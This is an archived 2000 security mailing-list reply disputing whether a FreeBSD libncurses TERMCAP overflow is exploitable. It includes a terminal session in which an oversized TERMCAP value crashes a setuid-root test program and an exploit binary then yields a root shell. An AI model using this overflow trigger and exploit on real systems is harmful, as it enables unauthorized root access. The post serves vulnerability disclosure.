Date: Tue, 25 Apr 2000 10:50:42 +0200 From: "Przemyslaw Frasunek" <venglin@freebsd.lublin.pl> To: "Kris Kennaway" <kris@FreeBSD.org> Cc: <BUGTRAQ@SECURITYFOCUS.COM>, <freebsd-security@freebsd.org> Subject: Re: freebsd libncurses overflow Message-ID: <002801bfae93$5b7e69a0$0273b6d4@freebsd.lublin.pl> References: <Pine.BSF.4.21.0004241225510.77386-100000@freefall.freebsd.org>
next in thread | previous in thread | raw e-mail | index | archive | help
> Furthermore, it is not actually a vulnerability. It seems that setuid
> programs will not accept an alternate termcap file via TERMCAP even under
> the old version of ncurses in FreeBSD 3.x. Therefore this "exploit" can
> only be used on your own binaries.
Sure?
lubi:venglin:~> uname -a
FreeBSD lubi.freebsd.lublin.pl 3.4-STABLE FreeBSD 3.4-STABLE #1: Wed Mar 1
11:18:54 CET 2000
venglin@lubi.freebsd.lublin.pl:/mnt/elite/usr/src/sys/compile/GADACZKA i386
lubi:venglin:~> cat dupa.c
main() { initscr(); }
lubi:venglin:~> cc -o d dupa.c -lncurses
lubi:venglin:~> su
s/key 76 ve15188
Password:
lubi:venglin:/home/venglin# chmod 4755 d ; chown root.wheel d
lubi:venglin:/home/venglin# exit
lubi:venglin:~> ./d
lubi:venglin:~> setenv TERMCAP `perl -e 'print "A"x5000'`
lubi:venglin:~> ./d
Segmentation fault
lubi:venglin:~> ./dupaexp 4000
ret: 0xbfbfba8c
# id
uid=0(root) gid=1001(users) groups=1001(users), 0(wheel)
Obviously, *most* binaries are dropping root privileges before using any ncurses
functions.
--
* Fido: 2:480/124 ** WWW: http://www.freebsd.lublin.pl ** NIC-HDL: PMF9-RIPE *
* Inet: venglin@freebsd.lublin.pl ** PGP: D48684904685DF43 EA93AFA13BE170BF *
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?002801bfae93$5b7e69a0$0273b6d4>